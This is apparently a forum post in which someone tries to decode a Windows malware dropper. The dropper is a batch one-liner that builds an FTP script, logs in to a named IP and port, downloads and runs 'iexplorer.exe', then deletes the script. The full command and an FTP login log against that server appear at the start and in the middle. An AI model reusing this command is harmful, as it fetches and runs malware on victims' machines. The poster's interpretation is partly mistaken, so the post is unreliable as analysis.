start %systemroot%\system32\cmd.exe
del eq&echo open 181.166.154.188 7191 >> eq&echo user 16446 10097 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eqAlright, I'm going to do my best to decipher this, line by line. Each >> probably shows line break, or new line. Small note, it looks like part of something bigger. A fragment.
start %systemroot%\system32\cmd.exe
del eq&echo open 181.166.154.188 7191This starts cmd.exe, deletes the file called eq and echos open 181.166.154.188 7191 to something, possibly a textfile named eq. An FTP server, from the looks.
start %so user 10515 16135Start is a batch/DOS (command prompt) command. It's used to start a program. The %so may be a variable, and user 10515 16135 is probably an argument. User is a command in the ftp program, mentioned later in the fragment.
eq &echo get iexplorer.exe
This might be adding 'get iexplorer.exe' to the file eq, which was created somewhere before.
eq &echo quitThis adds quit to eq.
eq &ftp -n -s:eq &iexplorer.exe &del eq
This is a bit red flag. It's calling FTP, which is a program. FTP = file transfer protocol = sending files over the internet. It's trying to launch it, like you might type into command prompt: ftp -n -s:eq. del eq = delete eq. eq is a file. If it's not calling cd to change directories, look in system32, where cmd.exe is located, for a text file named eq.txt. The -n argument is used to surpress the auto-login upon initial connection. -s is used to specify a text file with FTP commands in it. eq must be the text file full of commands. So what it's doing is adding to the text file:
get iexplorer.exe
quitFrom what I can tell, it's doing something really useless. It's getting the file iexplorer.exe and quitting the FTP program, it shouldn't even be sending anything because it never connected. User in ftp.exe sends new user information from the description it gave me said. So it must be sending a new username and password. I'll try to connect to the actual FTP server right now with those credentials.
EDIT: Upon connecting to the FTP server in FileZilla,
Status: Connecting to 181.166.154.188:7191...
Status: Connection established, waiting for welcome message...
Response: 220 StnyFtpd 0wns j0
Command: USER 10515
Response: 331 Password required
Command: PASS *****
Response: 230 User logged in.
Command: SYST
Response: 215 StnyFtpd
Command: FEAT
Error: Connection attempt interrupted by userI disconnected before it could do anything more.
It seemed to get stuck on FEAT. FEAT returns all features of the FTP server.
StnyFtpd 0wns j0 is prolly some leetspeek stuff. User 10515 may mean that Evar's computer is the 10515th computer infected. I found this after googling StnyFtpd 0wns j0.
http://seclists.org/fulldisclosure/2004/Sep/864Google StnyFtpd, you'll find plenty of scary articles about it.
I'll try to connect using ftp.exe now. This stuff is really cryptic.
EDIT: kback, and I may have just infected my computer with this virus inadvertantly. It said PORT command successful after I connected to it in ftp.exe, and then it told me that Windows Firewall blocked some features of ftp.exe. A bit scared now. I'm going to try again in a virtual machine.
